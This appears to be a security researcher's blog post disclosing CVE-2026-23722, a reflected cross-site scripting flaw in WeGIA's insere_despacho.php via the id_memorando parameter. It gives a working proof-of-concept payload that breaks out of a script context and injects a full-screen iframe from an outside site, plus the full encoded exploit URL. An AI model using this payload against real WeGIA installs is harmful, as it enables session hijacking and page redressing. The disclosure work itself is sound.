Featured image of post CVE-2026-23722
XSS Critical WeGia Security WebApp Code Execution

CVE-2026-23722

Cross-Site Scripting (XSS) Reflected

CVE-2026-23722: Cross-Site Scripting (XSS) Reflected allows arbitrary code execution and UI redressing

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2026-23722

Summary

A Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the WeGIA system, specifically within the html/memorando/insere_despacho.php file.

Details

Vulnerable Endpoint: /html/memorando/insere_despacho.php

Parameter: id_memorando

PoC

Payload:

1

</script><iframe src="https://js-dos.com/games/doom.exe.html" style="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;"></iframe>

Example of URL:

1

https://sec.wegia.org:8000/WeGIA/html/memorando/insere_despacho.php?id_memorando=1%3C%2Fscript%3E%3Ciframe%20src%3D%22https%3A%2F%2Fjs-dos.com%2Fgames%2Fdoom.exe.html%22%20style%3D%22position%3Afixed%3B%20top%3A0%3B%20left%3A0%3B%20bottom%3A0%3B%20right%3A0%3B%20width%3A100%25%3B%20height%3A100%25%3B%20border%3Anone%3B%20margin%3A0%3B%20padding%3A0%3B%20overflow%3Ahidden%3B%20z-index%3A999999%3B%22%3E%3C%2Fiframe%3E

Steps to Reproduce

  • The payload breaks out of the existing context (likely a JavaScript variable assignment) using script tag and injects an external iframe that covers the entire viewport.

Impact

  • Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.
  • Downloading malware: Attackers can trick users into downloading and installing malware on their computers.
  • Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.
  • Stealing credentials: Attackers can steal a user's credentials.
  • Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.
  • Defacing websites: Attackers can deface a website by altering its content.
  • Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.
  • Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.

Reference

https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g7hh-6qj7-mcqf

Finder

Marcos Tolosa

By: CVE-Hunters

© 2020 - 2026 CVE-Hunters
Built with Hugo
Theme Stack designed by Jimmy